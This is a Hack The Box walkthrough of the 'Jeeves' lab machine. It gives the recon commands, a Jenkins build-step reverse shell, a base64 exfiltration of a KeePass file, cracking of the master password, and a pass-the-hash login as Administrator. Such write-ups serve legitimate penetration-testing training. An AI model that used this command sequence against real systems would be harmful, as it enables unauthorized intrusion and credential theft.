Hack The Box
Medium Windows OSCP Prep

Jeeves

# Solution

# Finding the vulnerability

nmap shows open ports 80, 135,445, and 50000.
Video timestamp 0:10

1

nmap -Pn -p- --min-rate=1000 -T4 10.10.10.63 -vv -oN ports

We run -sCV on the open ports.

1

ls

1

ports=$(cat ports | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

1

echo $ports


1

nmap -p$ports 10.10.10.63 -sCV -oN version-basescripts

We try to login to SMB, but it requires a password.
Video timestamp 0:15

1

smbclient -N -L \\\\10.10.10.63\\

Port 50000 gives the 404 Not Found error listed with nmap.
Video timestamp 0:25

Port 80 also gives an error, this time as an image.
Video timestamp 0:32

We run ffuf and find a /askjeeves directory on port 50000 that’s running Jenkins.
Video timestamp 1:40

1

ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://10.10.10.63:50000/FUZZ -recursion -recursion-depth 1 -o ffuf

# Foothold

We find a RCE exploit for Jenkins at Jenkins RCE Creating Modifying Project
Video timestamp 2:19

  1. Create a New Item

  1. Enter an item Name, choose freestyle project, and click OK.

  1. Scroll down to build and add the Execute Windows batch command build step.

  1. Create a PoweShell #3 base64 encoded reverse shell at https://www.revshells.com/

  1. Paste the rev shell into Command and click Apply.

  1. Start your listener with rwlrap
1

rlwrap -cAr nc -lvnp <your chosen port>
  1. Navigate to http://10.10.10.63:50000/askjeeves/job/<your job's name>/ and click Build Now. This gives us a shell as user kohsuke.

We get the user flag on c:\users\kohsuke\desktop.
Video timestamp 4:19

1

dir c:\users\


1

cd c:\users\kohsuke\desktop

1

dir

# Privilege Escalation

We look around and find a KeePassfile in the c:\users\kohsuke\documentsdirectory.
Video timestamp 4:28

1

cd ..\Documents

1

dir

We move the file over to our attack box with base64 in powershell.
Video timestamp 4:40

On Windows:

1

[Convert]::ToBase64String((Get-Content -path "C:\users\kohsuke\documents\ceh.kdbx" -Encoding byte))

On our attack box:

1

echo "A9mimmf7S7UBAAMAAhAAMcHy5r9xQ1C+WAUhavxa/wMEA<snip>" | base64 -d > CEH.kdbx

We have CEH.kdbx on our local machine.

1

ls

We use kpcli to get the passwords.
Video timestamp 5:37

1

sudo apt update && sudo apt install kpcli

We need the CEH.kdbx master password.

1

kpcli

1

open CEH.kdbx

keepass2john helps us out.

1

keepass2john CEH.kdbx > CEH.kdbx-hash

Then we use john to get the master password.

1

john CEH.kdbx-hash --wordlist=/usr/share/wordlists/rockyou.txt

Now it’s time to grab the passwords from this CEH.kdbx file.

1

kpcli

1

open CEH.kdbx

After entering the moonshine1 password we find 7 password entries.

1

find .

We find a hash in entry 0

1

show -f 0

We put the hash in a file for Pass The Hash attacks.

1

echo "aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00" > hashes

We use crackmapexec to test the hash on the smb server. We find out the hash works on administrator.
Video timestamp 7:17

1

crackmapexec smb 10.10.10.63 --local-auth -u Administrator -H hashes

We use impacket-psexec to get on the server as Administrator.
Video timestamp 7:32

1

impacket-psexec Administrator@10.10.10.63 -hashes aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00

Instead of a root flag, we find hm.txt.
Video timestamp 7:51

1

cd c:\users\administrator\desktop

1

dir

The file says "The flag is elsewhere. Look deeper" .

1

type hm.txt

Let’s look deeper into the hm.txt file, then.

1

dir /r

We read the root.txtstream with CMD or PowerShell.
Video timestamp 8:21

CMD:

1

more < hm.txt:root.txt:$DATA

PowerShell:

1

powershell Get-Content hm.txt -stream root.txt

© 2024 - 2025 Blue Pho3nix
Built with Hugo
Theme Stack designed by Jimmy